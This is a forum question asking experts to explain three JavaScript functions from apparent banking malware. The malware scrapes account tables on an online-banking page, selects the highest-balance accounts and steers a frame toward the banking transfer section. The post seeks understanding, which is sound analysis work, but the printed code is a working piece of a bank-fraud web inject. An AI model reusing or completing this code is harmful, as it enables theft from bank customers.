# Analyzing a JS code that is trying to steal bank account information

Tags: javascript, html, analysis

I'm new to JS and trying to analyze this long code that is trying to steal bank account information at client-side. I have analyzed most of the code, except for these three functions. I have a vague idea what they are trying to do, but if JS experts could point out the exact functionality, that would be great.

```
  function ParseAccount(a, b) {
    var c = null;
    var d = /<td[^>]*>(.*)<\/td>\r\n<td[^>]*>(\d+)<\/td>\r\n<td[^>]*><span[^>]*>((?:[\d]+\.|)[\d]+(?!:,[\d]+)).*\r\n<td[^>]*>.
    *<input[^>]*value=transfer[^>]*name=([^>]*)>.*<\/td>/i;
    switch (a) {
      case "info":
        c = d.exec(b);
        break;
      default:
        c = null;
        break;
    }
    return c;
}

  function GetAccounts() {
    var a = new Array;
    a[0] = h_account;
    if (h_saccount != "") {
        a[1] = h_saccount;
    } else {
        a[1] = "empty";
    }
    return a;
}


 function CheckAccounts() {
              $("table.tablegrund.tablegrund2").each(function (e)        {$("table.tablegrund.tablegrund2:eq(" + e + ") tr").each(function (a) {var b = ParseAccount("info", $(this).html());if (null != b) {var c = b[3].split(",");var d = b[1].replace(/<[^>]*>/gi, "");c[0] = c[0].replace(".", "");if (parseInt(h_amount) < parseInt(c[0])) {h_amount = parseInt(c[0]);h_name = d;h_account = b[2];bigIndex = e;bigSubIndex = a;}}});$("table.tablegrund.tablegrund2:eq(" + e + ") tr").each(function (a) {var b = ParseAccount("info", $(this).html());if (null != b) {var c = b[3].split(",");var d = b[1].replace(/<[^>]*>/gi, "");c[0] = c[0].replace(".", "");if (parseInt(h_samount) < parseInt(c[0]) && parseInt(c[0]) != parseInt(h_amount)) {h_samount = parseInt(c[0]);h_sname = d;h_saccount = b[2];bigSecIndex = e;bigSecSubIndex = a;}}});});
        if (parseInt(h_amount) > 0) {
            var f = false;
            $("ul.nav_unterthema a").each(function (a) {if ($(this).html().match(/Banking/i)) {$("#navigator").attr("src", $(this).attr("href"));}});
        } else {
            parent.ClosePageLoad();
        }
    }

    $(document).ready(CheckSorting);
}
```